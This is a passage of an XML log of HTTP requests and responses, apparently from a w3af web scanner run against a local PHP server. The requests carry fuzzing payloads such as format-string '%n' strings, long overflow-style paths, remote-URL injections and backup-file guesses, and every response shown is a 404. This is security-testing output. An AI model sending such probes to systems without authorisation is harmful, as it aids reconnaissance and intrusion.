h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="315">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="318">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="324">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="326">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="327">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="328">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="329">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="330">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="331">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="332">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="333">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="336">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="337">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="338">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="339">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="340">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/OIkaALHH HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about OIkaALHH has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='OIkaALHH'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="341">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="342">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
